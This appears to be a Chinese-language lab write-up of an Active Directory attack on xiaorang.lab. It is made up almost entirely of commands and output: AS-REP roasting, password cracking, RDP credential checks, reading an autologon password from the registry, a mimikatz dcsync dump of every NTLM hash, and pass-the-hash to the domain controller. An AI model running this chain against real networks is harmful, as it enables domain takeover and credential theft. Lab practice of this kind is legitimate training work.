1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples] └─$ proxychains GetNPUsers.py -dc-ip 172.22.6.12 xiaorang.lab/ -usersfile '/home/hey/Desktop/user.txt' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 /usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html __import__('pkg_resources').run_script('impacket==0.12.0', 'GetNPUsers.py') Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User chengqiu@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User louyou@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User weishengshan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User maqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User wenbiao@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User wenliang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User chuyuan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User pangzhen@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User yulvxue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User luyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User lezhong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User guohong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User ganjian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User sheweiyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User dujian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User yexing@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User hongqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User lidongjin@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User qiaomei@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK [-] User maoda@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK $krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:65169ecc66c7d1d07e74fd0bf9aa8c1b$09166b49cc65f6c20ee6e0aeb6bda3aeb423b72088198856b99830e958a869c0ea29afb36063a39b8b2d223e4f2c360af0a8ab751dbcb6e55f889597d20446b93c68ab56dba6c09b4c22564eded27e484a2c3c765d699079a85f140091b80dc4531f9b183b2ef30530627d7ded0c29c543cf8e31b7458128a97ca6c63772d6c9d677aa6ff9c6a2f017fc268c0c5eb5e99423e2a2b6184fa6e6fdefe5d2636a4d44cc47b4cb49655c5c10364f5f207cfaf494ea0e8e054a8ffe55548f072a0d2a51f99fe10853a7ce4611aa71c3206bab18dd60527f3d06c7ee01aee0ad3812b7a22ef7c5e0ad1beb2f2fbe22 [proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.6.12:88 ... OK $krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:388eb817d56659e56a35087ea775ca5b$a75390df6135eac3463ac96895a1e24b467459486922a02fa91edc437b5434808911000ddf919cbd80f27fd0113742be2d0d517cb03832acd4f700578ba7706419768bbc012726d935990835e73a2495f19e22ca1166a98992bb3837917bc7979adfa3477002696197cb92c7ff71d7413afaa8562838ccf0cc962f74f9cf63fe18c64ca2bc6cf55617737ca57264c85b721e891a1963e8c61eb8b7f3ddc284710415cedb1a2b8a9040f386343076f526f4d13eced75126af76952830315b5b81a1bd700f35557ed40cc64eba1572bcd8127255d9e92478b5314cbc6fd19cdd58258024b307b953310f29dcd2
Hash爆破
1 2 wenshao:hellokitty zhangxin:strawberry
RDP爆破
1 2 3 4 5 6 7 8 $ proxychains crackmapexec rdp 172.22.6.0/24 -u wenshao -p hellokitty -d xiaorang.lab RDP 172.22.6.25 3389 WIN2019 [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True) RDP 172.22.6.12 3389 DC-PROGAME [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True) RDP 172.22.6.25 3389 WIN2019 [+] xiaorang.lab\wenshao:hellokitty (Pwn3d!) RDP 172.22.6.12 3389 DC-PROGAME [+] xiaorang.lab\wenshao:hellokitty mstsc /admin /v: 172.22.6.25:3389
域渗透
域内信息收集
Adinfo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 neo4j@ubuntu:/tmp$ ./Adinfo_linux -d xiaorang.lab --dc 172.22.6.12 -u zhangxin -p strawberry _____ _ __ /\ | __ \(_) / _| / \ | | | |_ _ __ | |_ ___ / /\ \ | | | | | '_ \| _/ _ \ Tools that collect information from domain / ____ \| |__| | | | | | || (_) | /_/ \_\_____/|_|_| |_|_| \___/ v1.5 by lzz [i] Try to connect '172.22.6.12' [c] Auth Domain: xiaorang.lab [c] Auth user: zhangxin@xiaorang.lab [c] Auth Pass: strawberry [c] connected successfully,try to dump domain info [i] DomainVersion found! [+] Windows 2016 Server operating system [i] Domain SID: [+] S-1-5-21-3623938633-4064111800-2925858365 [i] Domain MAQ found [+] 0 [i] Domain Account Policy found [+] pwdHistory: 0 [+] minPwdLength: 0 [+] minPwdAge: 0(day) [+] maxPwdAge: 10675199(day) [+] lockoutThreshold: 0 [+] lockoutDuration: 30(min) [i] Domain Controllers: 1 found [+] DC-PROGAME$ ==>>> Windows Server 2016 Datacenter [10.0 (14393)] ==>>> 172.22.6.12 [i] ADCS has not found! [i] Domain Exchange Server: 0 found [i] Domain All DNS: [+] Domain Dns 2 found,Saved in All_DNS.csv [i] Domain Trusts: 0 found [i] SPN: 31 found [i] Domain GPOs: 2 found [i] Domain Admins: 1 users found [+]Administrator [i] Enterprise Admins: 1 users found [+]Administrator [i] administrators: 1 users found [+]Administrator [i] Backup Operators: 0 users found [i] Users: 77 found [i] User with Mail: 0 found [i] Only_name_and_Useful_Users: 74 found [i] Only_admincount=1_andUseful_Users: 1 found [i] Locked Users: 0 found [i] Disabled Users: 3 found [i] Users with passwords not set to expire: 5 found [i] Domain Computers: 2 found [i] Only_name_and_Useful_computers: 2 found [i] Groups: 49 found [i] Domain OUs: 1 found [i] LAPS Not found [i] LAPS passwords: 0 found [i] SensitiveDelegate Users: 0 found [i] AsReproast Users: 2 found [+] wenshao [+] zhangxin [i] Kerberoast Users: 1 found [+] CN=krbtgt,CN=Users,DC=xiaorang,DC=lab ==>>> kadmin/changepw [i] SIDHistory Users: 1 found [+] yuxuan ==>>> Administrator [i] CreatorSID Users: 0 found [i] RBCD Users: 0 found [i] Unconstrained Deligation Users: 0 found [i] Constrained Deligation Users: 0 found [i] Krbtgt password last set time: 2022-06-29 09:03:34 +0800 CST [i] CSVs written to 'csv' directory in /tmp [i] Execution took 686.596318ms
发现yuxuan对应的SIDHistory用户是Administrator。在域内每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。SID History是在域迁移过程中需要使用的一个属性。如果域用户要从A迁移到B域,那么在B域中该用户的SID会随之改变,导致迁移后的用户不能再访问A域的资源。SID History的作用就是在域迁移后保持域用户对A域的访问权限,将原来的SID添加到迁移后用户的SID History属性中;即迁移后的用户保持原有权限,还是能访问原来可以访问的资源。
BloodHound
Owned
Find Shortest Paths to Domain Admins
此时的攻击路线已经很清晰了,要打到域控就要先从YUXUAN@XIAORANG这个用户入手。
域内攻击路径
SIDHistory Attack user:yuxuan
登陆普通域机器172.22.6.25(WIN2019),查看当前登陆用户;有的用户为了方便,会在注册表中配置密码和其他相关信息,用来自动执行登录过程。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 C:\Users\zhangxin\Desktop\hvv>quser 用户名 会话名 ID 状态 空闲时间 登录时间 yuxuan console 1 运行中 无 2025/3/9 19:48 >zhangxin rdp-tcp#1 2 运行中 . 2025/3/9 19:52 C:\Users\zhangxin\Desktop\hvv>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no DisableBackButton REG_DWORD 0x1 EnableSIHostIntegration REG_DWORD 0x1 ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe ShellCritical REG_DWORD 0x0 ShellInfrastructure REG_SZ sihost.exe SiHostCritical REG_DWORD 0x0 SiHostReadyTimeOut REG_DWORD 0x0 SiHostRestartCountLimit REG_DWORD 0x0 SiHostRestartTimeGap REG_DWORD 0x0 Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile WinStationsDisabled REG_SZ 0 ShellAppRuntime REG_SZ ShellAppRuntime.exe scremoveoption REG_SZ 0 DisableCAD REG_DWORD 0x1 LastLogOffEndTimePerfCounter REG_QWORD 0xedd7ccd15 ShutdownFlags REG_DWORD 0x80000027 AutoLogonSID REG_SZ S-1-5-21-3623938633-4064111800-2925858365-1180 LastUsedUsername REG_SZ yuxuan AutoAdminLogon REG_SZ 1 DefaultUserName REG_SZ yuxuan DefaultPassword REG_SZ Yuxuan7QbrgZ3L DefaultDomainName REG_SZ xiaorang.lab HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
BloodHound
直接dcsync即可拿下域控。
域控
dcsync
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 C:\Users\yuxuan\Desktop\hvv>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 02:01:23 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv [DC] 'xiaorang.lab' will be the domain [DC] 'DC-PROGAME.xiaorang.lab' will be the DC server [DC] Exporting domain 'xiaorang.lab' [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) 1103 shuzhen 07c1f387d7c2cf37e0ca7827393d2327 512 1104 gaiyong 52c909941c823dbe0f635b3711234d2e 512 1106 xiqidi a55d27cfa25f3df92ad558c304292f2e 512 1107 wengbang 6b1d97a5a68c6c6c9233d11274d13a2e 512 1108 xuanjiang a72a28c1a29ddf6509b8eabc61117c6c 512 1109 yuanchang e1cea038f5c9ffd9dc323daf35f6843b 512 1110 lvhui f58b31ef5da3fc831b4060552285ca54 512 1111 wenbo 9abb7115997ea03785e92542f684bdde 512 1112 zhenjun 94c84ba39c3ece24b419ab39fdd3de1a 512 1113 jinqing 4bf6ad7a2e9580bc8f19323f96749b3a 512 1115 yangju 1fa8c6b4307149415f5a1baffebe61cf 512 1117 weicheng 796a774eace67c159a65d6b86fea1d01 512 1118 weixian 8bd7dc83d84b3128bfbaf165bf292990 512 1119 haobei 045cc095cc91ba703c46aa9f9ce93df1 512 1120 jizhen 1840c5130e290816b55b4e5b60df10da 512 1121 jingze 3c8acaecc72f63a4be945ec6f4d6eeee 512 1122 rubao d8bd6484a344214d7e0cfee0fa76df74 512 1123 zhaoxiu 694c5c0ec86269daefff4dd611305fab 512 1124 tangshun 90b8d8b2146db6456d92a4a133eae225 512 1125 liangliang c67cd4bae75b82738e155df9dedab7c1 512 1126 qiyue b723d29e23f00c42d97dd97cc6b04bc8 512 1127 chouqian c6f0585b35de1862f324bc33c920328d 512 1128 jicheng 159ee55f1626f393de119946663a633c 512 1129 xiyi ee146df96b366efaeb5138832a75603b 512 1130 beijin a587b90ce9b675c9acf28826106d1d1d 512 1131 chenghui 08224236f9ddd68a51a794482b0e58b5 512 1132 chebin b50adfe07d0cef27ddabd4276b3c3168 512 1133 pengyuan a35d8f3c986ab37496896cbaa6cdfe3e 512 1134 yanglang 91c5550806405ee4d6f4521ba6e38f22 512 1135 jihuan cbe4d79f6264b71a48946c3fa94443f5 512 1136 duanmuxiao 494cc0e2e20d934647b2395d0a102fb0 512 1137 hongzhi f815bf5a1a17878b1438773dba555b8b 512 1138 gaijin b1040198d43631279a63b7fbc4c403af 512 1139 yifu 4836347be16e6af2cd746d3f934bb55a 512 1140 fusong adca7ec7f6ab1d2c60eb60f7dca81be7 512 1141 luwan c5b2b25ab76401f554f7e1e98d277a6a 512 1142 tangrong 2a38158c55abe6f6fe4b447fbc1a3e74 512 1143 zhufeng 71e03af8648921a3487a56e4bb8b5f53 512 1145 dongcheng f2fdf39c9ff94e24cf185a00bf0a186d 512 1146 lianhuangchen 23dc8b3e465c94577aa8a11a83c001af 512 1147 lili b290a36500f7e39beee8a29851a9f8d5 512 1148 huabi 02fe5838de111f9920e5e3bb7e009f2f 512 1149 rangsibo 103d0f70dc056939e431f9d2f604683c 512 1150 wohua cfcc49ec89dd76ba87019ca26e5f7a50 512 1151 haoguang 33efa30e6b3261d30a71ce397c779fda 512 1152 langying 52a8a125cd369ab16a385f3fcadc757d 512 1153 diaocai a14954d5307d74cd75089514ccca097a 512 1154 lianggui 4ae2996c7c15449689280dfaec6f2c37 512 1155 manxue 0255c42d9f960475f5ad03e0fee88589 512 1156 baqin 327f2a711e582db21d9dd6d08f7bdf91 512 1157 chengqiu 0d0c1421edf07323c1eb4f5665b5cb6d 512 1158 louyou a97ba112b411a3bfe140c941528a4648 512 1159 maqun 485c35105375e0754a852cee996ed33b 512 1160 wenbiao 36b6c466ea34b2c70500e0bfb98e68bc 512 1161 weishengshan f60a4233d03a2b03a7f0ae619c732fae 512 1163 chuyuan 0cfdca5c210c918b11e96661de82948a 512 1164 wenliang a4d2bacaf220292d5fdf9e89b3513a5c 512 1165 yulvxue cf970dea0689db62a43b272e2c99dccd 512 1166 luyue 274d823e941fc51f84ea323e22d5a8c4 512 1167 ganjian 7d3c39d94a272c6e1e2ffca927925ecc 512 1168 pangzhen 51d37e14983a43a6a45add0ae8939609 512 1169 guohong d3ce91810c1f004c782fe77c90f9deb6 512 1170 lezhong dad3990f640ccec92cf99f3b7be092c7 512 1171 sheweiyue d17aecec7aa3a6f4a1e8d8b7c2163b35 512 1172 dujian 8f7846c78f03bf55685a697fe20b0857 512 1173 lidongjin 34638b8589d235dea49e2153ae89f2a1 512 1174 hongqun 6c791ef38d72505baeb4a391de05b6e1 512 1175 yexing 34842d36248c2492a5c9a1ae5d850d54 512 1176 maoda 6e65c0796f05c0118fbaa8d9f1309026 512 1177 qiaomei 6a889f350a0ebc15cf9306687da3fd34 512 502 krbtgt a4206b127773884e2c7ea86cdd282d9c 514 1178 wenshao b31c6aa5660d6e87ee046b1bb5d0ff79 4260352 500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 512 1000 DC-PROGAME$ 2f942cc8e98e9690c56d280c5604e696 532480 1179 zhangxin d6c5976e07cdb410be19b84126367e3d 4260352 1181 WIN2019$ 02d6f2c5b28d43abcc6751712c77c4c8 4096 1180 yuxuan 376ece347142d1628632d440530e8eed 66048
hash传递
1 2 proxychians python3 wmiexec.py xiaorang/administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 proxychains python3 wmiexec.py xiaorang/administrator@172.22.6.12 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9